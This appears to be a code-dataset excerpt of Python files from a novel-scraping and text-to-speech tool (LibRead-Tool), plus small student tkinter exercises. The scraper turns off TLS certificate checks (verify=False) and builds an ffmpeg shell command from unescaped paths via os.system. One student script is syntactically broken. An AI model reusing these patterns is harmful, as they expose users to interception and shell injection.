ARTICLE_DIV_SELECTOR = config.get("SELECTOR_MAPS", "articleDivSelector")
global HEADERS
HEADERS = {
'authority': config.get("DOMAIN", "authority"),
'User-Agent' : config.get("DOMAIN", "userAgent"),
'origin': config.get("DOMAIN", "origin"),
'referer': config.get("DOMAIN", "referer")}
global DOMAIN_NAME
DOMAIN_NAME = config.get("DOMAIN", "domainName")
except:
printWar("Corrupted config file detected! Re-generating a new one...")
create_default_config(CONFIG_FILE)
_readConfig()
else:
create_default_config(CONFIG_FILE)
_readConfig()
def checkConnection():
_readConfig()
url = f"https://{DOMAIN_NAME}/"
try:
con = requests.get(url, timeout=10, verify=False)
if(con.status_code == 200):
return True
else:
print("Connection established with Status code " + con.status_code)
return False
except:
return False
def search(query: str):
_readConfig()
payload = {"searchkey": query}
res = requests.post(f"https://{DOMAIN_NAME}/search", data=payload, headers=HEADERS, verify=False)
soup = BeautifulSoup(res.content, 'html.parser')
#For Debugging purposes
with open("searchResultDump.html", 'w', encoding='utf-8') as f:
f.write(res.content.decode())
results = soup.select(SEARCH_PAGE_SELECTOR)
return results
def getMetadata(url: str):
_readConfig()
try:
res = requests.get(url, headers=HEADERS, verify=False)
except:
try:
res = requests.get(url, headers=HEADERS)
except Exception as E:
printErr(f"Error occured while fetching {url}. | Error: {E} |")
soup = BeautifulSoup(res.content, 'html.parser')
#For Debugging purposes
with open("novelPageDump.html", 'w', encoding='utf-8') as f:
f.write(res.content.decode())
metadata = {'chapters': [], 'status' : None, 'cover-image': None}
chapters = soup.select(CHAPTER_SELECTOR)
metadata.update({'chapters' : chapters})
status = "Unknow"
try:
status = soup.select(STATUS_SELECTOR_I)[0].text
except:
try:
status = soup.select(STATUS_SELECTOR_II)[0].text
except:
try:
status = soup.select(STATUS_SELECTOR_III)[0].text
except:
pass
metadata.update({'status' : status})
try:
imageUrl = f"https://{DOMAIN_NAME}/" + soup.select(IMAGE_URL_SELECTOR)[0]["src"]
image = requests.get(imageUrl, headers=HEADERS, stream=True)
metadata.update({'cover-image':image})
except:
pass
return metadata
def getArticle(url: str):
_readConfig()
try:
res = requests.get(url, headers=HEADERS, verify=False)
except:
try:
res = requests.get(url, headers=HEADERS)
except Exception as E:
printErr(f"Error occured while fetching {url}. | Error: {E} |")
soup = BeautifulSoup(res.content, 'html.parser')
#For Debugging purposes
with open('articlePageDump.html', 'w', encoding='utf-8') as f:
f.write(res.content.decode())
articleDiv = soup.select(ARTICLE_DIV_SELECTOR)
articleDiv = articleDiv[0:len(articleDiv)-1]
articleStr = ""
for article in articleDiv:
if(article.text == "…" or article.text == "..."):
continue
#filter out words that can break tts
articleStr += article.text.replace("�������.���", "").replace("…", "").replace("...", "").replace("�������.���", "").replace("“", "").replace("�", "").replace("�������.���", "").replace("*", "")
articleStr += "\n"
return articleStr | 5,472 | Python | .py | 125 | 35.608 | 298 | 0.63781 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,193 | ffmpegWrapper.py | Spectre-hidN_LibRead-Tool/src/utils/ffmpegWrapper.py | import subprocess
import re
import os
import configparser
from .configGenerator import create_default_config
from .Prettify import Prettify, clearLine
from .twoSecondSilence import getFileBytes
import music_tag
printSuc = Prettify.printSuc
printWar = Prettify.printWar
printErr = Prettify.printErr
printFeaturedText = Prettify.printFeaturedText
CONFIG_FILE = "libread-config.ini"
global EMBED_SUBS
def _sorted_alphanumeric(data):
convert = lambda text: int(text) if text.isdigit() else text.lower()
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
return sorted(data, key=alphanum_key)
def _readConfig():
if(os.path.isfile(CONFIG_FILE)):
try:
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
global EMBED_SUBS
EMBED_SUBS = config.getboolean("TTS_CONFIG", "embedSubtitles")
except:
printWar("Corrupted config file detected! Re-generating a new one...")
create_default_config(CONFIG_FILE)
_readConfig()
else:
create_default_config(CONFIG_FILE)
_readConfig()
def performSanityCheck() -> bool:
try:
result = subprocess.check_output(["ffmpeg", "-version"]).decode()
except:
printFeaturedText(msg="FFMPEG not found in the path! LibRead-Tool will download all articles before converting them.")
return False
ffmpegVersion = re.search("ffmpeg version (.*) Copyright", result).group(1)
printSuc(f"FFMPEG version {ffmpegVersion} found!")
return True
# Will merge all mp3 files into one and embed the subtitles from subs.txt
def mergeChunks(chunkFilesDir: str, outputFilePrefix: str, coverImagePath = None) -> None:
_readConfig()
allMP3Files = _sorted_alphanumeric([f for f in os.listdir(chunkFilesDir) if (os.path.isfile(os.path.join(chunkFilesDir, f)) and (f.split(".")[-1] == "mp3"))])
with open(f'{chunkFilesDir}/2s-delay.mp3', 'wb') as df:
df.write(getFileBytes())
ffmpegfileList = "".join(f"file '{f}'\nfile '2s-delay.mp3'\n" for f in allMP3Files)
with open(f'{chunkFilesDir}/inputFiles.txt', 'w', encoding="utf=8") as cf:
cf.write(ffmpegfileList)
retCode = os.system(f'ffmpeg -f concat -safe 0 -i "{chunkFilesDir}/inputFiles.txt" -c copy -map_metadata 0 "{outputFilePrefix}.mp3" -loglevel panic')
if(retCode != 0):
clearLine()
printErr(f"Merge Error occured! FFMPEG ReturnCode: {str(retCode)}")
return
# Add ID3 tags
f = music_tag.load_file(f'{outputFilePrefix}.mp3')
if(EMBED_SUBS):
with open(f"{chunkFilesDir}/subs.txt", 'r', encoding="utf-8") as sf:
f["lyrics"] = sf.read()
if(coverImagePath):
with open(coverImagePath, 'rb') as If:
f["artwork"] = If.read()
f.save() | 2,851 | Python | .py | 64 | 38.171875 | 162 | 0.682049 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,194 | Prettify.py | Spectre-hidN_LibRead-Tool/src/utils/Prettify.py | import sys
import os
import time
def clearScreen():
"""
Clears the terminal
"""
if os.name == 'nt':
os.system("cls")
else:
os.system("clear")
def clearLine():
"""
Clears the current line
"""
length = os.get_terminal_size()[0]
whiteSpace = " "*length
print(whiteSpace, end="\r")
class Prettify():
def __init__(self):
"""Return specified color escape c0des if flushCodes flag is False else flush it to the console."""
#For some unknown reason window's command prompt does not recognise any escape code unless it is registered/cache using system calls. The below line will make sure to recognise all escape codes.
if os.name == 'nt':
os.system('echo|set /p="\033[38;5;12m\033[0m"')
try:
if sys.argv[1] == 'dump_cols':
self.flushCodes = True
else:
self.flushCodes = False
except:
self.flushCodes = False
try:
if sys.argv[1] == 'dump_bgs':
self.OnlyBG = True
else:
self.OnlyBG = False
except:
self.OnlyBG = False
def dump_colors(self, code=None, ForBG=False):
for i in range(0, 256):
color_code = str(i)
if not self.OnlyBG:
escape_code = u"\u001b[38;5;" + color_code + "m"
else:
escape_code = "\033[48;5;" + color_code + "m"
if code != None:
if str(code) == color_code:
return escape_code
elif code == None:
if self.OnlyBG or self.flushCodes:
sys.stdout.write(escape_code + color_code.ljust(4) + " ")
def progressBar(self, total_size: int, size_done: int, prefix="On the way!", suffix="There", length=None, fill_symbol='█', ToBeFill_symbol=' ', static_color=[]): #type: ignore
"""
Simple Progress bar that changes colors upon progress!
PARAMETERS --> length {DEFAULT: os.get_terminal_size()[0] - len(prefix) - len(suffix)- 11}
prefix {DEFAULT: "On the way!"}
suffix {DEFAULT: "There"}
total_size {DATATYPE: int} [REQUIRED]
size_done {DATATYPE: int} [REQUIRED]
fill_symbol {DEFAULT: '█'}
ToBeFill_symbol {DEFAULT: ' '}
static_color {DEFAULT: []} (Index: [0 -> fill_symbol, 1 -> ToBeFill_symbol])
NOTE --> endline (\n) should be provided after the job is completed to bring the cursor to a new line.
When Overriding the 'fill_symbol' or 'ToBeFill_symbol' with characters of different length, then specifying the length manually might required.
"""
decimals = 1
if length == None:
length = os.get_terminal_size()[0] - len(prefix) - len(suffix) - 11
if len(fill_symbol) > 1:
length = length // len(fill_symbol)
total = total_size
ToBeFill_length = len(fill_symbol) // len(ToBeFill_symbol)
try:
ToBeFill_symbol = self.dump_colors(code=static_color[1]) + ToBeFill_symbol + self.dump_colors(code=7)
except (IndexError, TypeError):
pass
# Progress Bar Printing Function
def printProgressBar(iteration):
if self.flushCodes == True:
exit(0)
percent = round(float(("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))) + 0.1, 1)
if percent > float(100):
percent = 100.0
fill_color_applied = False
try:
fill = self.dump_colors(code=static_color[0]) + fill_symbol + self.dump_colors(code=7)
fill_color_applied = True
except (IndexError, TypeError):
pass
if not fill_color_applied:
if percent >= float(0) and percent <= float(11):
fill = self.dump_colors(
code=124) + fill_symbol + self.dump_colors(code=7)
elif percent > float(11) and percent <= float(21):
fill = self.dump_colors(
code=196) + fill_symbol + self.dump_colors(code=7)
elif percent > float(21) and percent <= float(31):
fill = self.dump_colors(
code=202) + fill_symbol + self.dump_colors(code=7)
elif percent > float(31) and percent <= float(41):
fill = self.dump_colors(
code=208) + fill_symbol + self.dump_colors(code=7)
elif percent > float(41) and percent <= float(55):
fill = self.dump_colors(
code=220) + fill_symbol + self.dump_colors(code=7)
elif percent > float(55) and percent <= float(71):
fill = self.dump_colors(
code=190) + fill_symbol + self.dump_colors(code=7)
elif percent > float(71) and percent <= float(85):
fill = self.dump_colors(
code=34) + fill_symbol + self.dump_colors(code=7)
elif percent > float(85):
fill = self.dump_colors(
code=46) + fill_symbol + self.dump_colors(code=7)
filledLength = int(length * iteration // total) + 1
bar = fill * filledLength + (ToBeFill_symbol * ToBeFill_length) * (length - filledLength)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end="\r")
if self.flushCodes or self.OnlyBG:
exit(0)
else:
printProgressBar(size_done)
def dump_styles(self, styles=None):
"""
Return esacpe code of specified
*** Tested on Unix terminal ***
"""
if styles == 'bold':
return "\033[1m"
elif styles == 'faint':
return '\033[2m'
elif styles == 'italic':
return '\033[3m'
elif styles == 'underline':
return '\033[4m'
elif styles == 'blink':
return '\033[5m'
elif styles == 'reverse':
return '\033[7m'
elif styles == 'conceal':
return '\033[8m'
elif styles == 'crossed-out':
return '\033[9m'
elif styles == 'double-underline':
return '\033[21m'
elif styles == 'bold-off' or styles == 'faint-off':
return '\033[22m'
elif styles == 'italic-off':
return '\033[23m'
elif styles == 'underline-off':
return '\033[24m'
elif styles == 'blink-off':
return '\033[25m'
elif styles == 'reverse-off':
return '\033[27m'
elif styles == 'reveal' or styles == 'conceal-off': #type: ignore
return '\033[28m'
elif styles == 'crossed-out-off':
return '\033[29m'
elif styles == "overlined":
return '\033[53m'
elif styles == 'overlined-off':
return '\033[55m'
elif styles == 'reset':
return '\033[0m'
@staticmethod
def printErr(msg: str, pauseOnError = True) -> None:
obj = Prettify()
print(f"{obj.dump_colors(code=196)}{msg}{obj.dump_styles(styles='reset')}")
input() if pauseOnError else None
@staticmethod
def printSuc(msg: str) -> None:
obj = Prettify()
print(f"{obj.dump_colors(code=46)}{msg}{obj.dump_styles(styles='reset')}")
@staticmethod
def printWar(msg: str) -> None:
obj = Prettify()
print(f"{obj.dump_colors(code=208)}{msg}{obj.dump_styles(styles='reset')}")
@staticmethod
def printInf(msg: str) -> None:
obj = Prettify()
print(f"{obj.dump_colors(code=198)}{msg}{obj.dump_styles(styles='reset')}")
@staticmethod
def printFeaturedText(msg: str, blinkersColorCode = 196, msgColorCode = 226):
self = Prettify()
print(self.dump_styles(styles='blink') + self.dump_colors(code=blinkersColorCode) + '♦ ' + self.dump_styles(styles='blink-off') + self.dump_colors(code=msgColorCode) + msg + self.dump_styles(styles='blink') + self.dump_colors(code=blinkersColorCode) + ' ♦' + self.dump_styles(styles='reset'))
if __name__ == "__main__":
"""For Debugging and Initial testing purposes"""
cl = Prettify()
cl.dump_colors()
dump_styles = False
try:
if sys.argv[1] == 'dump_styles':
dump_styles = True
else:
dump_styles = False
except:
pass
if dump_styles:
#show styles
print(cl.dump_styles(styles='underline') + 'Styles' + cl.dump_styles(styles='underline-off') + ' ' + cl.dump_styles(styles='underline') + 'Codename' + cl.dump_styles(styles='underline-off'))
print(cl.dump_styles(styles='bold') + "Bold Text" + cl.dump_styles(styles='bold-off') + ' ' + 'bold, bold-off')
print(cl.dump_styles(styles='faint') + "Faint Text" + cl.dump_styles(styles='faint-off') + ' ' + 'faint, faint-off')
print(cl.dump_styles(styles='italic') + "Italic Text" + cl.dump_styles(styles='italic-off') + ' ' + 'italic, italic-off')
print(cl.dump_styles(styles='underline') + "Underlined Text" + cl.dump_styles(styles='underline-off') + ' ' + 'underline, underline-off')
print(cl.dump_styles(styles='blink') + "Blinking Text" + cl.dump_styles(styles='blink-off') + ' ' + 'blink, blink-off')
print(cl.dump_styles(styles='reverse') + "Inverse FG/BG" + cl.dump_styles(styles='reverse-off') + ' ' + 'reverse, reverse-off')
print(cl.dump_styles(styles='conceal') + "Conceal Text" + cl.dump_styles(styles='reveal') + ' ' + 'conceal, reveal')
print(cl.dump_styles(styles='overlined') + "Overlined Text" + cl.dump_styles(styles='overlined-off') + ' ' + 'overlined, overlined-off')
print(cl.dump_styles(styles='crossed-out') + "Crossed Text" + cl.dump_styles(styles='crossed-out-off') + ' ' + 'crossed-out, crossed-out-off')
print(cl.dump_styles(styles='double-underline') + "Double underlined Text" + cl.dump_styles(styles='underline-off') + ' ' + 'double-underline, underline-off')
print()
print(cl.dump_styles(styles='blink') + cl.dump_colors(code=196) + '♦ ' + cl.dump_styles(styles='blink-off') + cl.dump_colors(code=226) + 'Tested on Unix Terminal. Some styles may not work on other platforms' + cl.dump_styles(styles='blink') + cl.dump_colors(code=196) + ' ♦' + cl.dump_styles(styles='reset'))
else:
for i in range(123452):
time.sleep(0.0001)
cl.progressBar(total_size=123452, size_done=i, fill_symbol=' ☻ ', ToBeFill_symbol=' ☺ ', length=20)
print()
| 10,903 | Python | .py | 217 | 38.400922 | 316 | 0.556664 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,195 | tts.py | Spectre-hidN_LibRead-Tool/src/utils/tts.py | import edge_tts
import os
import configparser
import re
from .Prettify import Prettify
from .configGenerator import create_default_config
import music_tag
CONFIG_FILE = "libread-config.ini"
global EMBED_SUBS
global VOICE_NAME
printWar = Prettify.printWar
def _readConfig():
if(os.path.isfile(CONFIG_FILE)):
try:
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
global VOICE_NAME
VOICE_NAME = config.get("TTS_CONFIG", "Voice")
global EMBED_SUBS
EMBED_SUBS = config.getboolean("TTS_CONFIG", "embedSubtitles")
except:
printWar("Corrupted config file detected! Re-generating a new one...")
create_default_config(CONFIG_FILE)
_readConfig()
else:
create_default_config(CONFIG_FILE)
_readConfig()
async def createTTSFromFile(filepath: str, outputFilePrefix: str, coverImagePath = None):
_readConfig()
inputFile = open(filepath, 'r', encoding='utf-8')
communicate = edge_tts.Communicate(inputFile.read(), VOICE_NAME)
submaker = edge_tts.SubMaker()
with open(outputFilePrefix+".mp3", "wb") as f:
async for chunk in communicate.stream():
if chunk["type"] == "audio":
f.write(chunk["data"])
elif chunk["type"] == "WordBoundary":
submaker.create_sub((chunk["offset"], chunk["duration"]), chunk["text"])
subs = submaker.generate_subs()
with open(outputFilePrefix+".vtt", "w", encoding="utf-8") as sf:
sf.write(subs)
subs = subs.replace("""WEBVTT""", "")
subs = re.sub("[0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3} --> [0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3}", "", subs)
subs = re.sub(r'(\n\s*)+', "\n", subs)
f = music_tag.load_file(outputFilePrefix+".mp3")
if(EMBED_SUBS):
f["lyrics"] = subs
if(coverImagePath):
with open(coverImagePath, 'rb') as img_in:
f["artwork"] = img_in.read()
f.save()
async def createTTSFromText(text: str, outputPath: str, coverImagePath = None, embedSubtitles = False):
_readConfig()
if(os.path.isfile(outputPath)): os.remove(outputPath)
communicate = edge_tts.Communicate(text, VOICE_NAME)
subFile = open(os.path.dirname(outputPath)+"/subs.txt", "a+", encoding="utf-8")
submaker = edge_tts.SubMaker()
with open(outputPath, "ab") as ttsFile:
async for chunk in communicate.stream():
if(chunk["type"] == "audio"):
ttsFile.write(chunk["data"])
elif(chunk["type"] == "WordBoundary"):
submaker.create_sub((chunk["offset"], chunk["duration"]), chunk["text"])
subs = submaker.generate_subs()
subs = subs.replace("""WEBVTT""", "")
subs = re.sub("[0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3} --> [0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3}", "", subs)
subs = re.sub(r'(\n\s*)+', "\n", subs)
subFile.write(f"{subs}\n")
subFile.close()
# Add ID3 tags
f = music_tag.load_file(outputPath)
if(embedSubtitles): f["lyrics"] = subs
if(coverImagePath):
with open(coverImagePath, 'rb') as img_in:
f["artwork"] = img_in.read()
f.save() | 3,214 | Python | .py | 76 | 34.723684 | 106 | 0.608401 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,196 | nuevo.py | Ingenieria2024_ingenieria_2024/nuevo.py | print("prueba nueva")
import tkinter as tk
from tkinter import ttk
print("prueba nueva2")
print("prueba nueva3") | 112 | Python | .py | 5 | 21.6 | 23 | 0.805556 | Ingenieria2024/ingenieria_2024 | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,197 | haciendounaventana.py | Ingenieria2024_ingenieria_2024/haciendounaventana.py | import tkinter as tkinter
from tkinter import ttk
def saludar():
print ("Hola a todxs")
root = tk.Tk ()
root.geometry("450x200")
root.title("practicando")
etiqueta = ttk.Label(root,text "Hoy practicamos tkinter", padding (50,30))
etiqueta.pack ()
boton_saludo = ttk.Button(root, text="saludo", command =saludar)
boton_escribir.pack()
boton_contestar = ttk.Button(root, text="contestar", command =contestar)
boton_contestar.pack()
boton_salir = ttk.Button(root, text="salir", command =root.destroy)
boton_salir.pack()
root.mainloop()
| 541 | Python | .py | 16 | 32.3125 | 74 | 0.760536 | Ingenieria2024/ingenieria_2024 | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,198 | presentacion.py | Ingenieria2024_ingenieria_2024/presentacion.py | # Presentación en Python
def presentacion():
nombre = "gisela"
ocupacion = "estudiante"
print(f"¡Hola! Soy {nombre}, {ocupacion}.")
if __name__ == "__main__":
presentacion()
| 205 | Python | .py | 7 | 23.857143 | 47 | 0.630435 | Ingenieria2024/ingenieria_2024 | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,199 | tkinter_GuzmanIvan.py | Ingenieria2024_ingenieria_2024/tkinter_GuzmanIvan.py | import tkinter as tk
from tkinter import ttk
# Ventana
root = tk.Tk()
root.geometry ("500x300")
root.title ("¡Bienvenidos al portal de la UNPAZ!")
root.config (background="light blue")
# 1° frame
frame1 = tk.Frame()
etiqueta_nombre = ttk.Label (frame1, text = "Ingresar su nombre y apellido", padding = (5, 5), font = "arial", background = "light green")
etiqueta_nombre.pack (side = "left", ipadx = 1, ipady = 1)
entrada_nombre = tk.Entry (frame1, bg = "white")
entrada_nombre.pack (side = "left")
frame1.pack()
# 2° frame
frame2 = tk.Frame()
etiqueta_dni = ttk.Label (frame2, text = "Ingresar su DNI", padding = (5, 5), font = "arial", background = "light green")
etiqueta_dni.pack (side = "left")
entrada_dni = tk.Entry (frame2, bg = "white")
entrada_dni.pack (side = "left")
frame2.pack()
# 3° frame
frame3 = tk.Frame()
etiqueta_contraseña = ttk.Label (frame3, text = "Ingresar contraseña", padding = (5, 5), font = "arial", background = "light green")
etiqueta_contraseña.pack()
entrada_contraseña = tk.Entry (frame3, bg = "white")
entrada_contraseña.pack()
frame3.pack()
# Botones
boton_cancelar = ttk.Button (root, text = "Cancelar", padding = (5, 5), command = root.destroy)
boton_cancelar.pack()
# Loop
root.mainloop() | 1,249 | Python | .py | 33 | 36.212121 | 138 | 0.708787 | Ingenieria2024/ingenieria_2024 | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.